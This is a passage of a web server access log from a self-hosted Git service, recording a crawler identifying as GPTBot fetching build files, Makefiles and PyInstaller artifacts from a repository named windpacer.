"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20387] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:15:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14308] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10025] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10945] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:15:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:15:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 9884] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:15:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:15:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 77831] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:15:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 2815266] [Gzip 25.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:15:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:15:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:15:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:15:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:15:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24016] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:15:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 53153] [Gzip 27.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:15:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 80608] [Gzip 29.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:15:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 80833] [Gzip 29.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:15:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:15:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 28049] [Gzip 20.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:15:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9896] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:15:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 22366] [Gzip 11.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:15:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10935] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:15:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 129724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" -[17/Feb/2026:15:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10374] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:15:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 27977] [Gzip 20.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:15:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16189] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:15:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 23508] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:15:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 14152496] [Gzip 11.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:15:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 31774] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:15:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 